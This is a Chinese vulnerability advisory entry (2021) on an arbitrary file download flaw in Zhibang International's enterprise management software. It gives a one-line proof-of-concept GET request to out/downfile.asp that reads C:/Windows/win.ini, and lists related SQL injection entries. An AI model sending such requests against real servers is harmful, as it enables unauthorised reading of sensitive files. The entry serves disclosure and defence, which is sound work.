漏洞
软件
控制台
智邦国际-企业管理软件任意文件下载漏洞
日期: 2021-10-11
| 影响软件:
智邦国际 企业管理软件
| POC:
已公开
漏洞描述
智邦国际-企业管理软件 out/downfile.asp 存在任意文件下载漏洞,攻击者可构造特殊请求获取服务器敏感文件。
PoC代码
复制
GET /out/downfile.asp?fileSpec=C:/Windows/win.ini HTTP/1.1
相关漏洞推荐
智邦国际-企业管理软件 RecordPrint.ashx SQL注入漏洞
智邦国际-企业管理软件 GetPersonalSealData 存在 sql注入漏洞